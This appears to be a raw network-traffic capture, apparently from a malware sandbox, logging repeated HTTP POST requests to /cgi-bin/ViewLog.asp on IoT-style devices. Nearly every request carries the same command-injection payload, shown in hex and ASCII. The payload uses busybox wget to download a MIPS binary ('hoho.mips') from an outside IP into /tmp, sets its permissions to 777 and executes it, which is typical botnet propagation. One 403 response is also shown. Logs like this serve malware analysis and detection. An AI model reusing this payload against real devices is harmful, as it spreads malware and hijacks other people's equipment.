                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              275192.168.2.145555094.122.119.438080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:25.708146095 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              276192.168.2.145481294.122.5.1538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:25.708230019 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              277192.168.2.144888431.136.36.2088080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:25.891836882 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:26.469554901 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:27.589724064 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:29.957444906 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:34.565258026 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:43.524868011 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:02.724055052 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:39.586507082 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              278192.168.2.144474462.29.42.378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:26.074301004 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              279192.168.2.143970294.110.226.1938080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:26.078046083 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              280192.168.2.144279262.150.144.1018080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:26.489141941 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:26.751636028 CET367INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              281192.168.2.144763231.136.47.108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:26.928591013 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:27.493658066 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:28.613595009 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:30.981410980 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:35.589230061 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:44.548803091 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:02.724030018 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:39.586514950 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              282192.168.2.143791031.136.201.978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:26.930265903 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:27.493654966 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:28.613588095 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:30.981404066 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:35.589221001 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
